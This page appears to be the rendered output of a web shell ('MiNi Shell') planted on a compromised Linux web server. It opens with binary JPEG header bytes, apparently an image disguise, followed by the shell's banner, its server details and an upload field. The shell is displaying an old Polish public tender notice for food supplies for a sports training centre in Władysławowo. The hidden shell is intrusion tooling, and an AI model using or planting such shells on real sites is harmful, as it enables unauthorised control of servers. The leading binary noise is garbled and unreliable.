JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110512/136425-N-2011.html

<p class="kh_header"><b>Władysławowo: Sukcesywne dostawy  artykułów spożywczych różnych</b><br>
<b>Numer ogłoszenia: 136425 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  artykułów spożywczych różnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy  artykułów spożywczych różnych  przez okres 6 miesięcy na potrzeby działu gastronomii tj. makarony, produkty marynowane i konserwowe , w puszkach, słoikach, produkty suche , owoce w syropie, płatki kukurydziane , przyprawy itp.Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2010 r. Nr 113 poz. 759 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.61.41.10-6, 15.61.33.13-5, 15.61.33.80-5, 15.61.31.00-9, 15.61.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. 2010 r. Nr 113 poz. 759 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawcy wykonali lub wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia dotyczące dostaw  artykułów spożywczych różnych   o wartości brutto (na jedno zamówienie, umowę, kontrakt, w okresie maksymalnie 6 miesięcy) : nie mniejszej niż : 
a.	10 000 PLN w przypadku składania oferty na część I
b.	20 000 PLN w przypadku składania oferty na część II
   W przypadku składania oferty na więcej niż jedną część, w/w kwoty należy odpowiednio zsumować .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. 2010 r. Nr 113 poz. 759 ze zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. 2010 r. Nr 113 poz. 759 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. 2010 r. Nr 113 poz. 759 ze zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Jeżeli z upływem 6 miesięcy od dnia podpisania umowy kwota określona w ust. 1 zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy 2. Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych). 3. W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej i wielkości opakowania) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2011 godzina 10:00, miejsce: Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo: SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze różne -I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze różne : 1.	BUDYŃ- śmietankowy, waniliowy, czekoladowy, 2.	GALARETKA OWOCOWA - 3.	KISIEL OWOCOWY -                  
4.	MAJONEZ LIGHT -5.	CHRZAN TARTY 6.	KETCHUP porcjowany saszetka 7.	MUSZTARDA porcjowana saszetka - 8.	MUSZTARDA SAREPSKA  9.	RYŻ DŁUGOZIARNISTY paraboiled 10.	Makaron Cannelloni - 100% semoliny z pszenicy DURUM 11.	Makaron  pene - 100% semoliny z pszenicy DURUM  12.	MAKARON GNIAZDKA - 100% semoliny z pszenicy DURUM - 13.	MAKARON MUSZELKA Mała  - 100% semoliny z pszenicy DURUM -
14.	MAKARON KOKARDKA  - 100% semoliny z pszenicy DURUM  15.	MAKARON KOLANKA Z FALBANKĄ  - 100% semoliny z pszenicy DURUM - 16.	MAKARON ŁAZANKI - 100% semoliny z pszenicy DURUM 17.	MAKARON NITKI -100% semoliny z pszenicy DURUM -18.	MAKARON W KSZTAŁCIE RYŻU - 100% semoliny z pszenicy DURUM  19.	MAKARON SPAGHETTI -100% semoliny z pszenicy DURUM 20.	MAKARON ŚWIDERKI -100% semoliny z pszenicy DURUM 21.	MAKARON LASAGNE -100% semoliny z pszenicy DURUM 22.	Makaron świderki 3 kolory - 100% semoliny z pszenicy DURUM 23.	PŁATKI KUKURYDZIANE -CORN FLAKES NESTLLE -24.	PŁATKI KUKURYDZIANE - GOLD FLAKES (miód) ,25.	PŁATKI KUKURYDZIANE cynamonowe -  26.	PŁATKI KUKURYDZIANE czekoladowe 27.	PŁATKI KUKURYDZIANE z miodem i orzechami - 28.	PŁATKI KUKURYDZIANE FITNESS - NESTLE ,29.	PŁATKI MUSLI  30.	MAJONEZ porcjowany 31.	MAJONEZ DEKORACYJNY - wiadra max 3kg 32.	MAJONEZ DEKORACYJNY -podchodzący wodą. - opakowanie słoik max 0,75 kg, 33.	KETCHUP łagodny - 34.	KETCHUP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.61.41.00-6, 15.61.33.13-5, 15.61.33.80-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły spożywcze różne -II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze różne : 1	ORZECH WŁOSKI ŁUSKANY - pakowany  1kg gatunek I  2	RODZYNKI SUŁTAŃSKIE   3	ŚLIWKA KALIFORNIJSKA bez pestki 4	MIGDAŁY PŁATKI . 5	MIGDAŁY CAŁE 6	ORZECH LASKOWY- 7	MORELE SUSZONE   8	Ananas kostka   9	ANANASY PLASTRY 10. BRZOSKWINIE POŁÓWKI  
11	GRUSZKI  POŁÓWKI w syropie -12	KOKTAJL OWOCOWY W SYROPIE- 13	FASOLA CZERWONA KIDNEY 14	GROSZEK KONSERWOWY 15	KUKURYDZA KONSERWOWA 16	KIELKI FASOLI MUNG - 17	SAŁATKA -  HAWAI    18	SAŁATKA SOMBRERO 19	OGÓRKI   20	PIECZARKA MARYNOWANA CAŁA   21	Pieczarka w zalewie naturalnej - 22	Karczochy serca   23	OLEJ  uniwersalny - opakowanie  3 litr lub 5 litrów
24	OLIWKI ZIELONE DRYLOWANE   25	OLIWKI CZARNE DRYLOWANE  26	OLIWKI ZIELONE  27	OLIWKI Czarne cięte -opakowanie puszka ,waga surowca netto w opakowaniu jednostkowym max do 3kg 
28	TUŃCZYK W SOSIE WŁASNYM ( kawałki )  29	TUŃCZYK W SOSIE WŁASNYM ( kawałki )                                     
30	OCET 10% -opakowanie butelka szklana  0,5l
31	OCET WINNY- biały, opakowanie, butelka o pojemności max do 500 ml
32	Ocet winny - czerwony butelka o pojemności max 1 litr 
33	JABŁKA PRAŻONE SZARLOTKA - waga samego surowca netto w szklanym opakowaniu jednostkowym max a 1000 gr, 34	OGÓRKI KANAPKOWE -35	CZEREŚNIE koktajlowe-Marascino Cherries-opakowanie słoik szklany,waga surowca netto max do 200 gr
36	SELER WIÓRKI 37	OLEJ  z pestek winogron -butelka 1litr, 38	Oliwa z oliwek pomace 1l 
39	Oliwa z oliwek extra virgin 1l
40	KAWIOR  czarny lub czerwony 41	NAPÓJ NESQUIK 42 	SYROP MALINOWY- butelka  max do 500 ml
43	Syrop korzenny - butelka plastikowa max 5 l
44	SEZAM ZIARNO - pakowane max 1000 gr
45	DŻEM  truskawka, wiśnia, czarna porzeczka- wiadra plastikowe max 5 kg
46	MIÓD PSZCZELI NATURALNY WIELOKWIATOWY - słoik  max 1 kg
47	AROMAT POMARAŃCZOWY 48	CUKIER WANILIOWY 49	TABASCO BRAND Peper Sauce  50	Pieczywo WASA Light żytnie-opakowanie kartonik o wadze  max 280 g
51	KASZA GRYCZANA - cała, prażona a5kg
52	KASZA JĘCZMIENNA -drobna opakowanie max 5 kg
53	Ryż biały opakowanie max 1 kg
54	MĄKA TORTOWA typ 450 - a1kg
55	SKROBIA ZIEMNIACZANA Superior  - a 1kg
56	RYŻ DZIKI - opak max 1 kg
57	RYŻ BRĄZOWY -  opak max 1 kg
58	KASZA KUS-KUS (uniwersalna kasza z pszenicy)                                opakowanie max 1 kg
59	PŁATKI OWSIANE -   500g max
60	CUKIER BIAŁY KRYSZTAŁ   -  1kg max
61	CUKIER PUDER   -    0,50kg max
62	Orzechy pistacjowe łuskane opakowanie max 1,00 kg 
63	Orzeszki pini opakowanie max 1 kg
64	Pomidory suszone w oliwie- opakowanie max 1 kg
65	Ziarno słonecznika - opakowanie  1,0 kg max
66	Migdały Słupki -opakowanie 1kg
67	Wiórki kokosowe - opak, max 200gr
68	Kotlety schabowe  sojowe- opakowanie  max 0,5 kg
69	Steki sojowe -  opakowanie max 500-600g 
70	Żurawina do mięsa - opakowanie słoik szklany  waga wsadu max 0,5 kg
71	Kasza manna-opakowanie ,max 1 kg
72	Kaszka kukurydziana-opakowanie 1 kg
73	Mąka kukurydziana-opakowanie 1 kg 
74	Cukier brązowy trzcinowy-opakowanie 1 kg
75	Borówka do mięsa - opakowanie słoik szklany, waga wsadu max 500 gr
76	Mandarynki -77	Pędy bambusa-opakowanie szklane,waga surowca netto w opakowaniu jednostkowym wsadu max  200 gr
78	Krem czekoladowy typu NUTELLA - opakowanie słoik a 500 - 650 g max
79	Musztarda Francuska - z całymi ziarnami gorczcy opakowanie - max 500g
80	Ocet Balsamiczny- but. szklana  500ml max
81	Kardamon mielony - opakowanie 20g- 60g
82	imbir mielony - opakowanie od 500g-1kg
83	Tortilla pszenna rozmiar max 32 cm
84	Olej arachdowy opakowanie 1 litr
85	Ciecierzyca - opakowanie 500g
86	Papryka konserwowa czerwona paski.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.61.31.00-9, 15.61.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com